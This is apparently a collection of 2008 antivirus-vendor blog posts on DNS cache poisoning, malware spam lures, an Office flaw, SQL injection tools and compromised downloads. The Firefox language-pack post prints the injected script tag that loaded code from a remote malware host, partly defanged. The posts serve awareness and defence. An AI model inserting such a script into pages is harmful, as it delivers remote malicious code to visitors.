|
|
|
A vulnerability in DNS (Domain Name System) has been discovered by Dan Kaminsky (IOActive, Director) which affected around 80 plus vendors. This is because the problem lies in the DNS protocol itself.
The Domain Name System (DNS), to make it easier to understand, is sort of like a phone book for the internet, wherein the name of a certain hostname is translated to its IP Address. This is most useful for average users since all they have to memorize is the name of the site and not it’s actual IP.
i.e. www.google.com - 64.233.187.99
The problem discovered lies in the fact that DNS servers could only use a small set of ports for DNS queries, thus making it easier to spoof a response to the DNS Server. This would allow an attacker to respond with a malicious site, which will be cached by the DNS server (cache poisoning).
In March, Kaminsky, along with several other security researchers, met on Microsoft's campus to brainstorm on what to do about this issue.
On July 8th a solution was implemented. Several vendors including Microsoft and Cisco released a patch to fix the issue on the same day. Kudos to the people involved on keeping a tight lead on things before a solution was released. This would have been a very messy situation for internet users (that would mean every single person, unless you live in a cave =p) had it been handled irresponsibly.
The patch basically adds additional randomization into the DNS by increasing the number of source ports that can be used with DNS queries.
Also, you can go to http://www.doxpara.com/ Dan Kaminsky's site to check if your DNS is affected by this vulnerability.
For more information about the vulnerability you can read up about it on the links below:
http://www.microsoft.com/technet/security/Bulletin/MS08-037.mspx
http://www.kb.cert.org/vuls/id/800113
|
|
|
|
There's a new batch of Porntube e-mails. Like the last time, the e-mails still link to a fake Porntube page (See below).
So far, I have seen three variations of e-mails all linking to the same site which ultimately leads to the download of video.exe (detected by Anchiva as Trojan/Exchanger.80D4!dldr).
Email details below:
Subject: (any of the following)
Kobe Bryant's incredbile dunk
Re: don't forget our 2pm meeting tomorrow
Clinton says: Hiliary cheated on me
Body: (any of the following)
The greatest uncensored clips from the hit movie Sex and the City http://kni{blocked}r.html
Did you know that anyone can find out all your darkest secrets by clicking here. http://por{blocked}
et/r.html
Angelina and Bradd home video , 25 minutes of slutty action , stolen and released http://pliki.{blocked}
l/r.html
If a user is tricked and goes to the said sites, an exe file named video.exe(Trojan/Exchanger.80D4!dldr) is automaticaly downloaded in the pretense that you have to install it in order to play the video (This kind of trick reminds me of ZLOB malwares). |
|
|
|
Just an FYI for the security conscious out there, there is a new vulnerability in Microsoft Word that allows Remote Code Execution.
As of this writing, there are already reports of it being exploited in the wild.
According to the Microsoft Advisory , the vulnerability only affects Microsoft Office Word 2002 Service Pack 3 and no other. This might be good news for most people but for those using the version mentioned above, here's some things that you would want your users to do while waiting for the patch from Microsoft.
1. The usual SOP for cases like these still apply, be wary of files that are sent to you, especially if it’s from someone you don't know.
2. Use another version of Microsoft Office.
3. [taken from Microsoft Advisory] Use Microsoft Office Word 2003 Viewer or Microsoft Office Word 2003 Viewer Service Pack 3 to open and view Microsoft Word files.
|
|
|
|
The mass SQL injection attacks that have been rampant on the internet for a few months now have become a recurring threat, not only to web administrators but more specifically to the common internet user.
In response to this Microsoft has released an advisory regarding the issue.
In the advisory, Microsoft recommends three tools to help administrators mitigate the SQL injection problem.
1. Detection - HP Scrawlr
Hewlett Packard has developed a free scanner which can identify whether sites are susceptible to SQL injection.
2. Defense - UrlScan version 3.0 Beta
UrlScan version 3.0 Beta is a Microsoft security tool that restricts the types of HTTP requests that Internet Information Services (IIS) will process. By blocking specific HTTP requests, UrlScan helps prevent potentially harmful requests from reaching the Web application on the server. UrlScan 3.0 will install on IIS 5.1 and later, including IIS 7.0.
3. Identifying - Microsoft Source Code Analyzer for SQL Injection
A SQL Source Code Analysis Tool has been developed. This tool can be used to detect ASP code susceptible to SQL injection attacks.
These tools would be a great help for cleaning up web developers. Good job for Microsoft and HP for providing these tools.
Note: Links to the tools can be found at the Microsoft Advisory page. |
|
|
|
The Vietnamese language pack for Firefox 2 has been reported to be compromised by Trojan/HTML.Xorer.DU and apparently, this has been going on since February 18 (according to the bug reports on the bugzilla site (https://bugzilla.mozilla.org/show_bug.cgi?id=432406).
This script was inserted at the end of the help files (.xhtml) of the Firefox add-on.
<script src="h**p://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>
The URL above turns out to be h**p://js.k0102.com/01.asp
Note: http is replaced with h**p in order to avoid users from accidentally clicking the link.
According to a blog entry from Mozilla (http://blog.mozilla.com/security/2008/05/07/compromised-file-in-vietnamese-language-pack-for-firefox-2/)
"There have been 16,667 total downloads of the Vietnamese language pack since November 2007, so we anticipate the impact on users to be limited."
This low number of downloads is probably one of the reasons why it took about two months before the infection has been discovered.
Some good news though, for Anchiva customers the pattern to detect the compromised .xhtml files has been released since January 2008 while the compromised file has only been uploaded since February, thus we can safely assume that our customers our protected from this.
Still with this happening, it has now come to a point where we can't even trust downloads from legitimate sites. There's always the fear that the site (even though it’s a trusted source) has been compromised, so first things first, before using any file downloaded from the net, be sure to, at the very least, run it through a virus scanner. The end effect of a compromised file might not be that significant to a single user but to a network used for production, this might lead to disastrous results. |
|
|
|
Yes, the name "Cyber Assassin" sounds cool. I used to think so too back when it was all make belief. Fiction sometimes has a way of becoming reality.
Back when everything was simple, hackers were just in it for the fame, which quickly shifted to monetary reasons, and now one of the goals is to actually cause harm to an individual.
On March 22, Epilepsy Foundation, an organization for people with epilepsy had an attack on their forums (http://www.epilepsyfoundation.org), the attack consisted of scripts which were used to post messages embedded with flashing gif pictures. The following day, the attackers changed tactics and injected javascripts that would redirect visitors to a site which contains images designed to actually cause seizures to photosensitive and pattern-sensitive epileptics.
According to a report from wired.com:
RyAnne Fultz, a 33-year-old woman who suffers from pattern-sensitive epilepsy, says she clicked on a forum post with a legitimate-sounding title on Sunday. Her browser window resized to fill her screen, which was then taken over by a pattern of squares rapidly flashing in different colors.
Fultz says she "locked up."
"I don't fall over and convulse, but it hurts," says Fultz, an IT worker in Coeur d'Alene, Idaho. "I was on the phone when it happened, and I couldn't move and couldn't speak."
It's a good thing that no reports of more serious manner appeared about this, but it’s possible that this could have escalated worse if the site wasn't cleaned up in time. I applaud the http://www.epilepsyfoundation.org administrators for cleaning the site fast, job well done you guys.
This incident reminds me of something I've read earlier this month. Researchers actually found a way to hack in to a patient's pacemaker via wireless access and either shut it down or deliver a shock which would ultimately cause a heart attack. Granted, this was done with about $30,000 worth of equipment, it does show that it can be done and with the rapid advancement in technology these days, who knows where this might go...
|
|
|
|
USB drives, MP3 players, phones and as of December of 2007, Digital Photo Frames. Any portable media device that is connected to a PC can be installed with malware and be the kick off of a network wide infection, the latest of which is PUA/NSAnti.F867!packed which is reported to be included in Digital frames sold at Best-buy, Costco, Target, and Sam's Club stores.
The first time I've heard of this attack was on December of 2007, amidst the chaos of buying Christmas gifts, people from SANS reported about it here.
Attacks from portable media devices is now becoming increasingly common and with U3 enabled flash drives, you can automatically execute any code from the USB drive. No interaction needed with the PC other than insert the drive and that's it. Users need to be more alert and security conscious than ever.
It's a good thing that the malware involved in the latest attack has been detected by Anchiva RapidRx since July of 2007 so Anchiva customers are protected. But what if this was an entirely new worm? Makes me think what other gadgets out there have a malware hiding in them.
As a standard operating procedure, always scan whatever you plug in to your computers to check for nasty hiding there. Also for the more security conscious (I'm included in this) you can disable the Autorun feature for windows so that malware can't automatically run from removable media devices. You can read more about disabling the Autorun feature here.
With all this in mind, I can't help but think of what the next gadget to be installed with malware would be. |
|
|
|
Unless you leave in a cave somewhere, you've heard all the buzz about Edison Chen and his pictures/videos of ex-girlfriends. It was only a matter of time before malware authors joined in. These kinds of attacks have been a pattern for a long time now, remember the Paris Hilton thing?
As of now the only avenue of infection I've seen are from forum replies and comments. Stating that they have a video of the latest release of the scandal and then supplying a link.
There are a number of sites that are used for this case but all have the same tactics. The site will say that there has been an "ActiveX Object Error" and that they need to download the new version in order to view the video. As you probably would have guessed already, there really is no video, instead your system gets compromised by malware.
Here are some snapshots of the sites:
The use of "download and install this, in order to view the video" tactic has been widely used especially on porn sites and is nothing new, it has been widely used, especially on porn sites, and will continue being used for years to come. It's important for users to be aware and alert of anything that looks suspicious. Making you download and execute an exe file to watch a video is just one of the things to look out for.
The malicious files downloaded from the sites are already detected as:
- setup.exe - Trojan/Zlob.ACA3
- install_player_3912996.exe - Trojan/Zlob.5AB4
- VideoAccessCodecInstall.exe - Trojan/Zlob.5AB4
- VideoAccessCodecInstall.exe - Trojan/Delf.CBDC!dldr
- instal.exe - Trojan/Delf.92F2!dldr
For now the only way to come by these sites is through the forum replies and comments, but I wouldn't be surprised if a storm of email is suddenly spammed in the net, capitalizing on the recent video or photo from this case. |
|
|
|
|
Like clockwork, storm worm malware doesn't disappoint. As expected a variety of emails for the new storm variant has been going around the net.
Here is a list of e-mail subjects/bodies for network admins to block:
A Hearty Wish
A Rose To Say...
Blind Love
Happy Valentine's Day!
Heart Pump
Hugs And Kisses
I Like You
I Love You
Is Anything Beautiful As A Rose?
Just You
Love Machine
Love Poem
Love Rose
Love You
Lovetrain
Me & You
My Heart
My Heart For You
My Love For You
Phone Love
Poem About Us
Powerful Love
Rockin' Valentine
Smiley Kiss
Spell Love
Sweetest Things Aren't Things!
The Love Train
Thinking Of U All Day
Tower of Love
Val-ANT-ines
Valentine's Day
Valentine Friends
Valentine Invitation
Valentine Mom
Valentuna
What is Love?
With All My Love...
World Love
You're my Valentine!
You Stay In My Heart
The e-mail bodies also contain a URL which would lead to the download of the storm worm. We're not about to show the URLs  , though rest assured, a pattern for this new storm variant has already been created and is detected as Worm/Zhelatin.BD5F.
|
|
|
|
We have been seeing a lot of e-mails promising a new naked video of
Britney Spears.
Here are the e-mail details:
Subject: New naked Britney video
See new naked Britney video in attachment!
The video is crazy!
Only 1 day trial - get this video now!
Get it now!
Subject: Naked Britney
Message body:
See new naked Britney video in attachment!
unzip it first!
The video is crazy!
Only 1 day trial - get this video now!
use password 123
This has been a social engineering tactic for a long time now. Users are
spammed with emails promising nude videos or pictures of celebrities.
Thing is, there never is a video. Instead, it typically is just malware that does more
harm to the user's system.
Examples of celebrities that have been targeted are Angelina Jolie,
Paris Hilton, Anna Kournikova and many others. And yes, Britney Spears
has also been used in the past. Actually, just think of a celebrity name
and Google it with the word malware. Chances are you'll see reports
about it being used.
The file sent or downloaded is already detected by RapidRx as
Trojan/Agent.00BA, so no need to worry for our customers.
As usual, here comes the standard advice of NOT clicking on URLs sent
through e-mail, especially from an untrusted source. Also, people need to
be more alert, just by looking at the email link and attachment, there
should already be a light bulb flashing since it’s an exe file and not a video file. |
|
